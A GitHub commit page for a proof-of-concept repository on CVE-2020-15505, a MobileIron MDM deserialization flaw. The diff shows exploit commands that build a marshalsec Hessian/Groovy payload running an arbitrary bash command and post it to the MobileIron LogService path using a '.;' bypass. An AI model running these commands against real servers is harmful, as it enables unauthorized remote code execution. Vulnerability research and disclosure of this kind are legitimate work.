Skip to content

Commit

Permalink
Adding Deserialization POC
Browse files Browse the repository at this point in the history
  • Loading branch information
iamnoooob authored Sep 21, 2020
1 parent 966aabd commit 7e513ea
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions CVE-2020-15505/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -6,6 +6,7 @@
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Groovy "/bin/bash" "-c" "<Command>" > exp.ser
python hessian.py -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService' -p exp.ser
```
![PoC2](deserpoc.png)

### Local JNDI Injection
```bash
Expand Down

0 comments on commit 7e513ea

Please sign in to comment.